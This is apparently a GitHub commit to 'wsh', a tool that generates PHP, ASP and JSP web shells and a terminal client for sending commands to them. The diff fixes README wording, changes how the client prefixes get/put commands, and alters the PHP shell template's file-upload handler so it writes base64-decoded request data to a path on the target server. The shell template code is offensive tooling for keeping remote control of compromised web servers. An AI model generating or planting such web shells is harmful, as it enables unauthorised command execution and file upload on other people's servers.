Fixed php file upload

EatonChips · Jun 30, 2020 · edcd100 · edcd100
1 parent 0fa4da4
commit edcd100
Show file tree

Hide file tree

Showing 3 changed files with 3 additions and 4 deletions.
diff --git a/README.md b/README.md
@@ -1,6 +1,6 @@
 # wsh
 
-wsh (pronounced woosh) is a web shell generator and command line interface. This started off as just an http client since interacting with webshells is a pain. There's a form, to send a command you have to type in an input box and press a button. I wanted something that fits into my work-flow better that ran in the terminal. Thus wsh was born.
+wsh (pronounced woosh) is a web shell generator and command line interface. This started off as just an http client since interacting with webshells is a pain. There's a form, to send a command you have to type in an input box and press a button. I wanted something that fits into my workflow better and ran in the terminal. Thus wsh was born.
 
 The client features command history, logging, and can be configured to interact with a previously deployed webshell with a form/button. The generator creates webshells in php, asp, and jsp. They are generated with random variables, so each will have a unique hash. They can be configured with a whitelist, passwords, and allow commands to be sent over custom headers and parameters. The generator and client can be configured through command line flags or configuration files to allow for saving a setup that works for you without doing what I call the "--help" dance. Once configured, the client and generator use the same config file.
 
@@ -73,7 +73,6 @@ $ wsh generate php --param cmd --no-file -o shell.php
 Created shell at shell.php.
 
 $ wsh 127.0.0.1:8080/shell.php --param cmd
-
 ```
 
 ```php

diff --git a/cmd/root.go b/cmd/root.go
@@ -314,7 +314,7 @@ func sendRequest(cmd string) (string, error) {
 	var body io.Reader
 
 	// Prepend prefix
-	if prefix != "" {
+	if prefix != "" && !strings.HasPrefix(cmd, "get") && !strings.HasPrefix(cmd, "put") {
 		cmd = fmt.Sprintf("%s %s", strings.TrimSpace(prefix), cmd)
 	}
 

diff --git a/templates/php.tml b/templates/php.tml
@@ -62,7 +62,7 @@
       echo {{ index .V "destPath" }}.' already exists';
       die;
     }
-    file_put_contents({{ index .V "destPath" }}, file_get_contents('php://input'));
+    file_put_contents({{ index .V "destPath" }}, base64_decode($_REQUEST['f']));
     echo 'Uploaded '.{{ index .V "filePath" }}.' to '.{{ index .V "destPath" }};
     die;
   }